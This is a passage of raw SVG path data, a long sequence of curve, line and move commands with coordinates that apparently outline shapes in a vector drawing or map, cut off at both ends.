947,272.69747 943.65621,270.2236 941.84004,270.52298 C 940.87733,270.68167 939.87891,269.89423 939.46309,268.6483 C 938.76961,266.57043 938.73073,266.58196 938.27723,269 C 938.01935,270.375 937.42122,271.97233 936.94804,272.54961 C 935.62741,274.16082 934.49933,282.42747 935.70148,281.6845 C 936.75684,281.03225 939,285.03591 939,287.5718 C 939,288.38454 940.08096,289.46048 941.40214,289.96279 C 942.72332,290.4651 945.19832,292.2388 946.90214,293.90434 C 949.28422,296.2329 950.00086,297.80684 950.00374,300.7163 C 950.00579,302.79733 950.93004,306.01325 952.05763,307.86278 C 953.18521,309.71231 953.83406,311.49928 953.49951,311.83382 C 953.16497,312.16836 952.57822,312.00511 952.19563,311.47104 C 951.20753,310.09174 944.9527,306.71397 944.40355,307.26312 C 944.15166,307.51501 945.53518,308.93356 947.47805,310.41546 C 950.42586,312.66387 950.90277,313.53921 950.35943,315.70406 C 949.90276,317.52356 950.05051,318.08682 950.85416,317.59014 C 951.48437,317.20064 952,316.23352 952,315.44098 C 952,314.64844 952.675,314 953.5,314 C 955.4345,314 955.44766,315.89099 953.51831,316.63135 C 952.37701,317.06931 952.27817,317.65124 953.08805,319.16453 C 953.9105,320.70129 954.44142,320.87855 955.52593,319.97848 C 957.21154,318.57955 959.33837,319.67583 958.61185,321.56913 C 958.32337,322.32088 958.58722,323.24489 959.19818,323.62248 C 959.87084,324.03821 960.02756,323.85361 959.59549,323.15451 C 959.20305,322.51953 959.33197,322 959.88197,322 C 960.43197,322 961.10383,322.35899 961.375,322.79775 C 962.0435,323.87941 960.26722,326.62638 959.30432,326 C 958.88157,325.725 958.38022,327.6375 958.19021,330.25 C 957.85367,334.87704 957.91792,335.00016 960.67236,335.00616 C 962.22756,335.00955 964.78894,335.68455 966.36431,336.50616 C 969.66783,338.22906 973.598,338.45946 974.51008,336.98369 C 974.85554,336.42472 975.6696,336.3042 976.3191,336.71587 C 976.96859,337.12755 979.75,337.7297 982.5,338.054 C 987.17822,338.60568 987.33911,338.71537 985,339.75842 L 982.5,340.87323 L 985.08333,340.93661 C 986.50417,340.97148 987.96489,341.29823 988.32939,341.66272 C 988.69389,342.02722 990.45639,342.48138 992.24606,342.67195 C 994.03573,342.86253 996.12304,343.8018 996.88453,344.75923 C 998.19907,346.41199 998.23857,346.41153 997.66592,344.75 C 997.33419,343.7875 997.23684,343 997.4496,343 C 997.66235,343 998.62205,342.69853 999.58226,342.33006 C 1000.6303,341.92789 1001.0825,342.05742 1000.7138,342.65412 C 1000.3759,343.20082 1001.044,343.61479 1002.1985,343.57406 C 1003.353,343.53333 1004.4931,344.0625 1004.7321,344.75 C 1005.132,345.9002 1000.7455,346.61643 996,346.17579 C 990.91856,345.70396 990,345.47419 990,344.6749 C 990,344.18602 990.7875,344.08583 991.75,344.45226 C 993.19551,345.00257 993.27079,344.89069 992.18268,343.80925 C 991.09634,342.72956 990.62582,342.8244 989.49921,344.35014 C 988.65649,345.49142 987.64286,345.89731 986.85361,345.40952 C 986.1499,344.97461 983.30746,344.48374 980.53707,344.31871 C 977.76668,344.15367 974.375,343.59604 973,343.07952 C 971.625,342.56301 967.9125,341.85143 964.75,341.49824 C 961.5875,341.14506 959,340.43847 959,339.92804 C 959,339.41762 958.0449,339 956.87756,339 C 955.05871,339 954.94223,338.77454 956.06325,337.42378 C 957.14616,336.11897 957.12874,335.6976 955.96209,334.97657 C 955.14279,334.47021 954.31215,334.49492 953.978,335.0356 C 953.00724,336.60632 941.39089,324.81393 938.48533,319.30815 C 936.97839,316.45263 935.12771,313.87925 934.37272,313.58953 C 933.61772,313.29981 933,312.34632 933,311.47066 C 933,310.59501 930.075,307.02467 926.5,303.53659 C 920.23537,297.42426 918.41885,294 921.44098,294 C 922.23352,294 923.11447,294.3762 923.39864,294.836 C 923.68281,295.2958 924.88558,295.60052 926.07145,295.51315 C 927.45913,295.41092 930.12298,297.21965 933.54577,300.58818 C 938.78397,305.74332 943,308.18673 943,306.06739 C 943,305.48032 942.65985,305 942.24411,305 C 941.30607,305 939.47378,300.79513 938.0857,295.45703 C 936.95019,291.09018 933.46299,286.59582 931.94039,287.53684 C 930.89778,288.18121 930.68301,286.47201 931.05613,280.5 C 931.56608,272.33809 931.50295,267.81084 930.87377,267.42199 C 930.5179,267.20204 929.91077,265.3379 929.5246,263.27945 C 929.13844,261.22101 928.38576,258.72081 927.852,257.72346 C 926.92212,255.98597 926.7459,255.99392 923.63993,257.91352 C 921.68533,259.12153 919.52522,259.6886 918.19917,259.34183 C 916.98963,259.02553 916,258.70375 916,258.62677 C 916,258.54978 916.42559,257.00286 916.94575,255.18915 C 917.72999,252.45468 917.55921,251.55921 915.94575,249.94575 C 914.87559,248.87559 914,247.34083 914,246.53518 C 914,245.72953 913.0651,244.57002 911.92244,243.95849 C 910.68895,243.29835 910.07488,242.24725 910.41099,241.37137 C 910.73146,240.53622 910.54511,240.1631 909.98148,240.51144 C 909.07198,241.07355 908.74796,240.52144 907.35027,236.02803 C 906.96185,234.77929 906.76103,234.76862 906.02617,235.95765 C 905.15712,237.36381 904.0662,237.75164 898.5,238.63326 C 892.71073,239.55021 891.01271,240.04157 891.12428,240.76758 C 891.48543,243.11755 890.63097,244.25624 887.53607,245.54938 C 885.6309,246.34541 883.63604,247.78494 883.10303,248.74835 C 882.57002,249.71176 880.75508,251.4 879.06984,252.5 C 877.38459,253.6 876.00446,255.0625 876.00288,255.75 C 876.00129,256.4375 875.3801,257 874.62244,257 C 873.86479,257 872.66769,257.69548 871.96223,258.54551 C 871.25677,259.39554 870.0511,259.84985 869.28296,259.55509 C 868.18684,259.13447 867.91697,260.14669 868.0287,264.25958 C 868.107,267.14181 867.84592,271.43037 867.44853,273.78972 C 866.85854,277.29258 867.08413,278.48487 868.67839,280.28972 C 871.26701,283.22029 874,287.67551 874,288.96482 C 874,290.50978 870.2143,294 868.53854,294 C 866.52996,294 864.70268,286.91221 865.89963,283.76398 C 866.44758,282.32278 866.45882,280.75633 865.92725,279.91653 C 865.11671,278.636 864.57743,279.32371 864.88158,281.25 C 864.94671,281.6625 864.1,282 863,282 C 861.70435,282 861,282.66667 861,283.89301 C 861,288.30844 854.99802,285.93358 853.54743,280.94418 C 853.15659,279.59988 851.8093,276.25 850.55346,273.5 C 843.46559,257.97928 840.54455,249.02875 841.03703,244.34011 C 841.40744,240.81366 840.99728,238.45613 840.22467,239.67072 C 838.53899,242.3207 834.41279,242.21822 831.11639,239.44449 C 829.35624,237.96342 828.08347,236.24959 828.28801,235.63597 C 828.69281,234.42156 824.85813,231 823.09227,231 C 822.49152,231 822,230.51786 822,229.92857 C 822,226.8292 819.09066,225.94843 810.29563,226.38517 C 805.45803,226.6254 798.35391,226.29951 794.50869,225.66097 C 788.39262,224.64534 787.35215,224.154 786.1975,221.73616 C 784.98754,219.20252 784.70799,219.09112 782.84123,220.39865 C 780.64637,221.936 773.74183,221.62523 773.16667,219.96321 C 772.98333,219.43345 772.19583,219 771.41667,219 C 770.6375,219 770,218.55 770,218 C 770,217.45 769.08588,217 767.96862,217 C 766.85135,217 765.64976,216.2125 765.2984,215.25 C 764.21456,212.28095 761.57479,209.45514 760,209.57818 C 755.87642,209.90035 755.77975,209.98633 756.46623,212.72147 C 756.8419,214.21827 758.71003,216.95872 760.61761,218.81134 C 762.5252,220.66397 764.3464,223.482 764.66473,225.07364 C 764.98306,226.66529 765.63994,227.72253 766.12446,227.42308 C 766.61691,227.11873 766.5477,226.02338 765.96752,224.93931 C 765.39668,223.87269 765.17047,223 765.46482,223 C 766.92657,223 767.51092,223.67671 767.62364,225.5 C 767.69164,226.6 767.80414,227.97193 767.87364,228.54872 C 767.99894,229.58865 775.99074,229.99501 775.99683,228.96176 C 775.99857,228.66573 778.025,226.73083 780.5,224.66199 L 785,220.90046 L 785,223.57267 C 785,225.73783 784.73681,226.02646 783.61301,225.09379 C 782.51523,224.18271 781.65996,224.61541 779.51135,227.16888 C 777.336,229.75414 776.13649,230.35062 773.47359,230.17128 C 767.22054,229.75016 768.15018,233.36249 774.57092,234.43518 C 778.63131,235.11353 778.6453,235.10478 779.98315,231.05106 C 781.42905,226.66994 783.07576,226.19343 786.20716,229.25 C 787.19322,230.2125 788.9609,231 790.13533,231 C 791.30976,231 793.33693,232.15053 794.64015,233.55673 C 796.5317,235.59774 796.79987,236.50543 795.96964,238.05673 C 795.39764,239.12553 794.47574,240 793.92098,240 C 793.36622,240 793.04455,240.7875 793.20616,241.75 C 793.40378,242.92694 792.84507,243.50602 791.5,243.51837 C 790.07883,243.53143 789.52298,244.18262 789.5794,245.76837 C 789.62343,247.0058 789.06219,248 788.31961,248 C 787.58306,248 786.20982,248.9 785.26797,250 C 784.32612,251.1 783.02867,252 782.38475,252 C 781.74082,252 780.95496,252.675 780.63837,253.5 C 780.32179,254.325 778.94482,255 777.57844,255 C 774.42693,255 770.00612,256.9843 769.9802,258.41052 C 769.95729,259.67073 758.60319,265.05927 752,266.94373 C 749.525,267.65006 746.59204,268.64677 745.48231,269.15863 C 744.37259,269.6705 742.48808,270.16286 741.29452,270.25277 C 738.44961,270.46707 737.73595,273.45106 740.03254,275.52945 C 741.71911,277.05577 742.54636,277.02865 751.67406,275.14782 C 757.07833,274.03423 762.625,272.84088 764,272.49594 C 766.30301,271.91819 766.50575,272.14576 766.57292,275.38397 C 766.61303,277.31732 766.27553,278.67029 765.82292,278.39056 C 765.37032,278.11083 764.9926,278.69602 764.98355,279.69098 C 764.9745,280.68594 763.87222,283.3 762.53403,285.5 C 761.19584,287.7 758.99816,291.53391 757.65029,294.0198 C 755.32126,298.31525 748.42606,305.31414 742.53283,309.3646 C 741.04073,310.39013 737.76323,313.87763 735.2495,317.1146 C 732.73576,320.35157 730.18878,323.01465 729.58954,323.03257 C 728.09511,323.07723 724.73144,330.40813 726.00933,330.83541 C 726.56105,331.01989 726.69668,331.68177 726.31072,332.30627 C 725.23127,334.05285 725.02646,342.10168 726.078,341.45179 C 726.5851,341.13839 727,341.35852 727,341.94098 C 727,342.52344 726.54143,343 725.98095,343 C 724.65174,343 725.84244,348.17691 727.47733,349.50596 C 728.20166,350.0948 728.9204,354.03401 729.21067,359.00596 C 729.83066,369.62541 727.65531,373.95597 720.92889,375.49287 C 719.51477,375.81597 716.98735,377.29976 715.3124,378.79017 C 713.63745,380.28057 711.43713,381.98789 710.4228,382.5842 C 708.6853,383.60567 708.66631,383.98361 710.09473,389.11559 C 712.23538,396.8065 711.17009,400.237 706.01193,402.26318 C 703.22037,403.35973 701.96198,404.47195 701.875,405.91955 C 701.80625,407.0638 701.6375,408.45 701.5,409 C 701.3625,409.55 701.19375,410.70037 701.125,411.55637 C 701.05625,412.41237 699.70481,414.32487 698.1218,415.80637 C 696.53879,417.28787 694.62629,419.65854 693.8718,421.07452 C 690.02755,428.28922 677.95927,434.90085 669.5,434.42665 C 667.3,434.30333 663.28082,434.83188 660.5685,435.60121 C 657.85617,436.37055 655.60617,436.95213 655.5685,436.89362 C 655.53082,436.83511 654.36113,436.33293 652.96917,435.77766 z M 660.5,434.27237 C 661.6,433.96688 665.00876,433.61044 668.07503,433.48029 C 679.92929,432.97712 689.36524,427.99574 693.4587,420.07986 C 694.30013,418.45271 695.86999,416.50405 696.94726,415.74949 C 699.18565,414.18167 701.51027,409 699.97525,409 C 699.43886,409 699,409.45 699,410 C 699,411.37362 697.72783,411.25269 695.56858,409.6738 C 693.39289,408.0829 694.2784,403.50912 696.59034,404.39629 C 698.54717,405.1472 698.41496,401.61257 696.30755,396.83602 C 694.93415,393.72313 694.09472,393 691.85461,393 C 688.72073,393 684,394.89952 684,396.16052 C 684,396.62223 683.37748,397 682.61663,397 C 681.85578,397 680.99791,397.9 680.71025,399 C 680.42259,400.1 679.47011,401 678.59362,401 C 677.71713,401 677,401.65917 677,402.46482 C 677,404.80088 673.53315,406.1532 670.50038,405.00014 C 667.09089,403.70386 666,403.7377 666,405.13976 C 666,406.83844 662.81876,408.93202 660.18261,408.9682 C 658.42838,408.99227 657.99756,408.57473 658.40978,407.25 C 658.70929,406.2875 658.52151,404.825 657.99248,404 C 657.31757,402.94749 657.02606,404.33261 657.01531,408.64301 C 657.00313,413.53156 656.64263,414.93928 655.25,415.53652 C 652.9649,416.5165 647.83779,416.08676 646.25,414.78216 C 644.28669,413.16902 644.78251,415.02115 648.02658,421.4185 C 649.88058,425.07461 650.79025,428.08551 650.40632,429.29515 C 649.65948,431.64825 654.64522,436.25026 657,435.38133 C 657.825,435.0769 659.4,434.57787 660.5,434.27237 z M 682.18123,420.95421 L 679.89628,418.82546 L 682.49966,416.41273 C 685.57883,413.55906 685.81685,413.52428 688.10382,415.59396 C 689.8825,417.20364 689.66001,420 687.75325,420 C 687.18523,420 686.21326,420.69367 685.59333,421.54148 C 684.59796,422.90273 684.19901,422.83406 682.18123,420.95421 z M 686.8278,419.16478 C 688.81922,417.6328 688.94592,417.2 687.70455,416.16976 C 685.21474,414.1034 680.89061,417.39596 682.55577,420.09024 C 683.35375,421.38139 684.17874,421.20267 686.8278,419.16478 z M 654.41821,414.39301 C 655.73252,413.88866 656,411.85946 656,402.39301 C 656,393.23797 656.27789,391 657.41467,391 C 658.45481,391 658.91812,389.27855 659.16467,384.4979 L 659.5,377.9958 L 655.95,377.9979 C 653.9975,377.99906 651.9725,377.5945 651.45,377.09888 C 650.16496,375.87996 628,375.05686 628,376.22806 C 628,377.09107 630.66974,382.05792 635.40258,390 C 636.54973,391.925 637.56087,395.075 637.64957,397 C 637.86299,401.63182 639.96063,410.16496 641.29126,411.81429 C 641.91304,412.58498 643.3129,412.8873 644.6758,412.54523 C 646.34405,412.12653 647,412.39061 647,413.48095 C 647,415.05832 651.3051,415.58762 654.41821,414.39301 z M 697.12656,405.72656 C 696.37857,404.97857 695.8654,405.18718 695.38707,406.43371 C 694.9788,407.49763 695.26446,408.54945 696.10428,409.07459 C 697.83277,410.15542 698.70355,407.30355 697.12656,405.72656 z M 664.76426,405.34907 C 666.52879,402.92675 666.9696,402.79375 669.87584,403.80687 C 673.51445,405.0753 676,404.46347 676,402.29939 C 676,401.48174 676.9,400.57741 678,400.28975 C 679.1,400.00209 680,399.16973 680,398.44005 C 680,397.71037 681.89037,395.98608 684.20083,394.60829 L 688.40166,392.10321 L 685.70083,391.07636 C 684.21537,390.51159 683,389.46271 683,388.74551 C 683,387.58424 682.07659,386.66466 678.44721,384.21158 C 677.86818,383.82021 676.34616,381.77558 675.06495,379.66796 C 673.1865,376.57787 672.32543,375.96298 670.61773,376.49221 C 669.45298,376.85317 666.5875,377.60153 664.25,378.15524 L 660,379.16197 L 660,385.58098 C 660,390.62011 659.67755,392 658.5,392 C 656.4219,392 656.48403,400.28289 658.5862,403.49121 C 659.4586,404.82267 659.88205,406.38184 659.52718,406.95602 C 658.0733,409.30845 662.97586,407.80414 664.76426,405.34907 z M 700.54632,406.14593 C 700.08579,404.69494 700.99512,403.75412 704.72893,401.81843 C 709.34846,399.42357 709.4985,399.20453 709.4528,394.92219 C 709.42684,392.48963 709.00866,389.59951 708.52352,388.49968 C 706.91445,384.85193 707.25795,383.27884 710.01979,381.64738 C 711.52357,380.75908 714.20504,378.67674 715.97863,377.01996 C 717.75222,375.36318 719.57131,374.23505 720.02105,374.51301 C 720.47079,374.79096 721.55004,374.3071 722.41938,373.43776 C 723.28872,372.56842 724,372.17497 724,372.56343 C 724,372.95189 724.90726,372.11632 726.01614,370.70661 C 728.8108,367.15378 728.60746,353.83667 725.69757,349.84318 C 724.45838,348.14252 723.78308,345.63429 723.82118,342.87376 C 723.85391,340.50184 723.41774,338.00334 722.8519,337.32155 C 722.28606,336.63975 722.1151,334.75244 722.47199,333.12753 C 722.99674,330.73837 722.7438,330.05346 721.1499,329.54758 C 720.06586,329.20352 718.45557,327.81804 717.57147,326.46874 C 714.93054,322.43817 706.95545,319 700.24715,319 L 694.42782,319 L 694.54817,322.62731 C 694.63216,325.15865 693.96324,327.01564 692.33426,328.77333 C 689.33037,332.01459 689.38275,335.00161 692.52466,339.63148 C 695.32653,343.76026 699.23892,346.48658 704.21019,347.77445 C 706.78888,348.4425 707.60977,349.25902 708.00783,351.55189 C 708.45948,354.15341 708.96022,354.50816 712.5336,354.75818 C 714.74346,354.9128 718.76893,354.37197 721.4791,353.55633 C 728.02439,351.58648 728.51305,352.33671 722.07707,354.4744 C 719.2982,355.39739 715.00869,356.0286 712.54482,355.87709 C 710.08095,355.72557 707.73225,355.93442 707.32548,356.34119 C 706.54702,357.11965 710.96937,366 712.13549,366 C 712.9671,366 712.06372,369.64857 710.4729,372.71487 C 709.32675,374.92409 709.25073,374.93453 707.59923,373.10965 C 706.52573,371.92344 706.11532,370.36587 706.48148,368.86759 C 706.93837,366.99805 706.51419,366.25039 704.46503,365.3134 C 702.32513,364.33493 701.11143,364.45196 697.54515,365.98064 C 692.68282,368.06488 690.87363,370 693.78734,370 C 696.29075,370 701.68095,372.71821 702.26379,374.27457 C 702.5162,374.94856 702.34492,378.65 701.88319,382.5 C 701.18572,388.31553 700.59525,389.86208 698.39362,391.6398 C 695.79581,393.73742 695.77566,393.84394 697.37178,397.04344 C 698.2673,398.83855 699,402.03814 699,404.15364 C 699,406.26914 699.48032,408 700.06739,408 C 700.65445,408 700.86997,407.16567 700.54632,406.14593 z M 699.79484,388.27431 C 700.02543,387.29844 700.3592,384.68267 700.53655,382.46149 C 700.7139,380.24031 700.94402,377.99031 701.04793,377.46149 C 701.71975,374.04223 698.63512,371.621 692.22816,370.53855 C 688.79791,369.95901 688,370.11114 688,371.34471 C 688,372.181 687.15935,373.13204 686.13188,373.45814 C 685.10442,373.78425 683.45968,374.93957 682.4769,376.02553 C 681.47584,377.13169 679.40746,378 677.77358,378 C 675.12227,378 675,378.14286 676.42857,379.57143 C 677.29286,380.43571 678,381.53527 678,382.01489 C 678,382.49451 679.35,383.68439 681,384.65907 C 682.65,385.63375 684,387.16216 684,388.05555 C 684,389.56657 688.03941,391.36569 693.5,392.28678 C 695.98555,392.70604 699.23746,390.63321 699.79484,388.27431 z M 664.79733,376.14642 C 665.83355,375.4891 665.78323,375.06499 664.54733,374.03928 C 663.44985,373.12845 663,370.91943 663,366.44091 L 663,360.12672 L 666.25,359.81336 C 669.12481,359.53618 669.5,359.15367 669.5,356.5 C 669.5,354.85 669.05,353.57086 668.5,353.65747 C 667.95,353.74408 666.60775,353.96908 665.51722,354.15747 C 664.03902,354.41283 663.45041,353.86378 663.20427,352 C 662.78478,348.82356 662.28637,344.43643 662.125,342.5 C 662.05625,341.675 661.1,341 660,341 C 658.9,341 658,340.53417 658,339.96482 C 658,339.26773 657.33764,339.28412 655.97199,340.01499 C 654.85659,340.61194 654.17908,341.48074 654.46642,341.94567 C 654.75376,342.4106 653.21339,342.96031 651.04338,343.16725 C 647.31501,343.52281 647.00431,343.33597 645.39708,339.77176 L 643.69625,336 L 637.34813,336 C 633.85666,336 631,336.21589 631,336.47976 C 631,336.74363 631.74174,338.81333 632.64832,341.07908 C 633.82101,344.00994 633.97503,345.3974 633.18209,345.88746 C 632.38668,346.37905 632.48739,347.38555 633.53377,349.40245 C 635.58533,353.35684 635.40678,357.71193 633.14344,358.92323 C 631.23092,359.94678 627.46178,371.15766 628.29877,373.33317 C 628.59134,374.09362 632.53563,374.61536 639.62384,374.83124 C 645.60573,375.01342 650.9275,375.57592 651.45,376.08124 C 652.62676,377.2193 663.02595,377.27008 664.79733,376.14642 z M 684.75992,373 C 687.04946,370.8 689.61511,369 690.46136,369 C 691.30761,369 692,368.58722 692,368.08271 C 692,367.5782 694.03503,366.38823 696.52229,365.43834 C 699.00956,364.48844 700.85068,363.51735 700.61369,363.28035 C 700.37669,363.04336 700.62308,361.42083 701.16122,359.67473 C 702.52604,355.24631 702.98463,350.58595 702.17928,349.32892 C 701.18035,347.76974 693.3868,344 691.16228,344 C 690.10772,344 688.78544,344.5625 688.22388,345.25 C 685.97204,348.0069 686.82256,361.84573 689.15523,360.40406 C 689.71708,360.05682 689.62463,359.25264 688.92611,358.41097 C 687.99989,357.29495 688.09426,357 689.37756,357 C 690.4415,357 691,357.86059 691,359.5 C 691,361.10606 690.4381,362 689.42857,362 C 687.43995,362 684.68894,359.31232 685.43762,358.10093 C 685.74845,357.598 685.10214,357.42204 684.00138,357.70989 C 682.90062,357.99775 682,357.77291 682,357.21025 C 682,356.64759 681.09688,356.42341 679.99306,356.71207 C 678.88924,357.00072 676.62482,356.67302 674.961,355.98384 C 671.44907,354.52916 671.08227,354.73527 670.78472,358.33051 C 670.59391,360.63602 670.1163,361 667.28189,361 L 664,361 L 664,366.97695 C 664,372.15368 664.31585,373.16084 666.3591,374.49963 C 667.6566,375.34979 669.42926,375.77251 670.29836,375.439 C 671.16745,375.1055 672.69336,375.30661 673.68926,375.88591 C 677.24624,377.95494 680.48081,377.11175 684.75992,373 z M 711,368.92461 C 711,366.66722 708.94286,362 707.94789,362 C 706.78913,362 705.79532,356.80468 706.76802,355.83198 C 708.15842,354.44158 706.97284,349 705.27951,349 C 704.36281,349 704.00832,349.5793 704.36163,350.5 C 704.67821,351.325 704.55039,352 704.07758,352 C 703.60477,352 703.37055,353.575 703.5571,355.5 C 703.74364,357.425 703.5221,359 703.06477,359 C 702.60744,359 702.01633,359.82957 701.75118,360.84348 C 701.23654,362.81149 703.79115,365 706.60301,365 C 707.8328,365 708.10702,365.65982 707.71957,367.68662 C 706.99333,371.48575 707.84335,373.37489 709.61678,371.90308 C 710.37755,371.2717 711,369.93138 711,368.92461 z M 685.56457,353.50753 C 685.92492,351.58667 685.97838,349.38603 685.68336,348.61722 C 684.97248,346.7647 688.56184,343 691.03896,343 C 693.52545,343 693.51566,341.92527 691,338.72713 C 689.9,337.32871 689,334.90255 689,333.33567 C 689,331.76879 688.5862,329.04396 688.08044,327.28049 C 686.92515,323.25221 689.85339,312.84941 693.12194,309.3702 C 694.39854,308.01132 694.81881,307 694.10693,307 C 693.33116,307 693.09733,306.26871 693.48376,305.05115 C 694.37766,302.23474 690.88552,299.07534 687.32935,299.48315 C 685.77321,299.6616 683.825,299.23071 683,298.52561 C 681.248,297.02824 675.17534,295.99645 674.77441,297.12803 C 674.62348,297.554 672.90849,298.06357 670.9633,298.26041 C 669.01812,298.45726 666.76839,299.02511 665.9639,299.52231 C 663.90126,300.79709 658.82166,300.10597 656.76876,298.27123 C 655.36114,297.0132 654.75361,296.95959 653.51876,297.98443 C 652.68344,298.67768 652,300.22479 652,301.42244 C 652,302.6201 651.5649,304.0351 651.03311,304.56689 C 650.50132,305.09868 649.85319,307.70911 649.59283,310.36785 C 649.15682,314.82035 645.56008,321.97668 643.75,321.99317 C 643.3375,321.99693 643,323.10182 643,324.44848 C 643,325.79514 641.9359,328.04514 640.63533,329.44848 C 638.0949,332.18965 636.00947,332.77327 635.98469,330.75 C 635.97263,329.76561 635.80315,329.76169 635.18707,330.73156 C 634.7568,331.40891 633.50616,331.79006 632.40788,331.57855 C 631.00876,331.3091 630.36808,331.76365 630.26765,333.09699 C 630.13944,334.79897 630.85889,335 637.07833,335 L 644.03236,335 L 645.70139,338.5 C 647.01456,341.25374 647.95999,342 650.13552,342 C 651.65633,342 653.26048,341.38395 653.70031,340.63099 C 654.73322,338.86273 659,337.49536 659,338.93261 C 659,339.51968 659.9,340 661,340 C 662.29167,340 663.04427,340.70833 663.125,342 C 663.23751,343.8001 663.48925,346.12473 664.19643,351.89378 C 664.41217,353.65372 666.23411,353.6448 669.09631,351.8698 C 669.42427,351.66641 670.44765,352.12663 671.37047,352.8925 C 672.29329,353.65838 673.31603,354.0173 673.64321,353.69012 C 673.9704,353.36293 674.92421,353.78136 675.7628,354.61995 C 676.68848,355.54562 678.18916,355.91836 679.58247,355.56866 C 680.8447,355.25186 682.15657,355.44431 682.49773,355.99633 C 683.70218,357.94517 684.91701,356.95932 685.56457,353.50753 z M 987,342.8 C 987,342.36 985.9125,342 984.58333,342 C 983.25417,342 982.0018,341.50541 981.8003,340.90091 C 981.32057,339.46171 975,336.81032 975,338.04827 C 975,339.36147 967.25158,339.25474 966.81183,337.93549 C 966.30792,336.42377 958,335.41763 958,336.86833 C 958,337.49075 958.6375,338 959.41667,338 C 960.19583,338 960.99155,338.47466 961.18494,339.05481 C 961.37832,339.63495 964.00332,340.51566 967.01827,341.01193 C 970.03322,341.5082 974.3,342.28619 976.5,342.74081 C 981.62348,343.79956 987,343.82986 987,342.8 z M 724.78776,331.86329 C 724.53811,331.11434 724.08482,331.56764 723.73121,332.91984 C 723.29624,334.58319 723.42638,334.97362 724.16845,334.23155 C 724.74955,333.65045 725.02824,332.58473 724.78776,331.86329 z M 957.02936,329.5 C 957.60622,325.14115 956.61539,322.82662 954.51723,323.63176 C 953.72849,323.93443 952.87992,323.19279 952.44688,321.82232 C 952.04329,320.54504 950.85945,318.89925 949.81613,318.16499 C 948.51123,317.24665 948.12387,316.1851 948.57499,314.76372 C 949.11572,313.06004 948.90881,312.82101 947.39588,313.40158 C 946.38667,313.78885 945.87743,313.78924 946.26422,313.40245 C 947.1844,312.48226 942.12923,307.80209 940.98138,308.51151 C 940.49717,308.81077 939.11447,307.72127 937.90871,306.0904 C 936.70296,304.45953 934.43024,302.59242 932.85822,301.94127 C 931.2862,301.29012 930,300.15279 930,299.41386 C 930,297.82591 926.35803,295.66069 925.04843,296.47007 C 924.5478,296.77947 923.85554,296.57528 923.51008,296.01631 C 922.70233,294.70934 921,294.69828 921,296 C 921,297.20753 924.6643,301 925.83102,301 C 926.28808,301 927.23761,302.07547 927.94109,303.38993 C 928.64457,304.70439 930.20179,306.30522 931.40159,306.94733 C 932.60139,307.58944 933.64451,308.93089 933.71965,309.92833 C 933.79478,310.92577 934.97242,312.94622 936.33663,314.41822 C 937.70083,315.89022 939.59745,318.7608 940.55132,320.79729 C 942.80542,325.6097 951.49022,333.66437 954.32473,333.57137 C 956.09083,333.51343 956.59957,332.7476 957.02936,329.5 z M 632,330 C 632.89254,330.55162 633.9783,330.43576 634.87908,329.6928 C 636.00994,328.76006 636.42228,328.78848 636.77033,329.82313 C 637.42446,331.76769 641.99582,327.19477 642.01597,324.57569 C 642.02476,323.43406 643.37476,320.97652 645.01597,319.11449 C 646.65719,317.25246 648.02583,315.45246 648.0574,315.11449 C 648.72171,308.00297 649.20761,305.39239 650.0177,304.5823 C 651.64128,302.95872 651.14765,302.39807 648.25,302.57459 C 644.33348,302.81316 643.98723,302.91143 644.10815,303.75 C 644.16763,304.1625 643.90478,305.45657 643.52402,306.62571 C 642.91875,308.48425 642.38715,308.65116 639.29453,307.95366 C 635.67557,307.13745 633,307.5879 633,309.01337 C 633,309.45303 633.9,309.57741 635,309.28975 C 636.5348,308.88839 637,309.25907 637,310.88337 C 637,312.04752 636.53417,313 635.96482,313 C 635.25124,313 635.25124,313.60093 635.96482,314.93426 C 637.23642,317.31028 637.2787,321.01111 636.0563,322.94314 C 635.34793,324.06275 634.62043,324.14809 632.81134,323.32381 C 630.35262,322.20354 628.5,323.24609 628.5,325.75 C 628.5,327.98822 626.55278,326.56616 626.42836,324.23707 C 626.36187,322.99246 626.53439,322.20106 626.81173,322.4784 C 627.08907,322.75573 627.89112,322.50533 628.59407,321.92193 C 629.41871,321.23754 630.51571,321.19267 631.68608,321.79548 C 635.54949,323.78534 637.43041,320.26332 634.77504,316.01139 C 633.80843,314.4636 633.80843,313.79157 634.77504,312.82496 C 636.63399,310.96601 636.24148,309.78858 634,310.5 C 632.44024,310.99505 632,310.6797 632,309.06739 C 632,307.43696 631.36593,307 629,307 C 626.46667,307 626,307.38889 626,309.5 C 626,311.51537 625.50393,312 623.44098,312 C 622.03352,312 621.11047,312.36973 621.38976,312.82162 C 621.66904,313.27351 620.99565,314.41547 619.89334,315.35929 C 618.5549,316.50531 618.09981,317.7391 618.52333,319.07351 C 619.47139,322.06059 628.33178,330.74924 629.53354,329.87031 C 630.10198,329.45456 631.21189,329.51292 632,330 z M 726.97776,324.37244 C 726.98999,323.75229 727.60095,322.74615 728.33545,322.13657 C 729.32147,321.31824 729.55032,318.94547 729.21008,313.06806 C 728.82516,306.4187 729.0371,304.82004 730.49715,303.36 C 732.16098,301.69616 732.15499,301.57841 730.37251,300.91109 C 729.30777,300.51248 727.54146,300.81387 726.27798,301.60975 C 724.35362,302.82194 723.4829,302.7924 719.77798,301.38926 C 717.42509,300.49816 713.81067,299.5486 711.74592,299.27912 C 707.66746,298.74681 703.9278,299.66682 705.54838,300.80379 C 707.04008,301.85035 709.38324,307.29174 709.07782,309 C 708.93032,309.825 708.17747,310.85986 707.40482,311.29969 C 706.63217,311.73952 706,313.41944 706,315.03284 C 706,317.51589 706.72934,318.34906 710.75,320.45906 C 716.45903,323.4551 719,325.37958 719,326.70743 C 719,327.25025 720.0125,328.16568 721.25,328.74173 C 723.10265,329.60412 723.80512,329.41036 725.22776,327.64454 C 726.17803,326.46504 726.96553,324.9926 726.97776,324.37244 z M 692.86432,324.91614 C 692.2137,324.51404 690.96556,324.45266 690.09068,324.77975 C 688.69893,325.30009 688.67636,325.15777 689.91021,323.64172 C 690.68583,322.68871 691.92333,322.14034 692.66021,322.42311 C 693.3971,322.70587 694,322.35135 694,321.63528 C 694,319.73039 693.12137,319.1555 691.04134,319.69944 C 688.87168,320.26682 687.98834,323.73617 689.18789,326.97889 C 690.01331,329.2102 690.09499,329.22401 692.04245,327.46159 C 693.46954,326.17009 693.70638,325.43656 692.86432,324.91614 z M 738.88239,312 C 742.1892,308.975 746.9849,304.71574 749.5395,302.53497 C 752.0941,300.35421 755.29351,296.52921 756.64929,294.03497 C 758.00506,291.54074 760.19236,287.68715 761.50994,285.47144 C 762.82752,283.25573 764.20874,279.54678 764.57932,277.22934 L 765.25309,273.01581 L 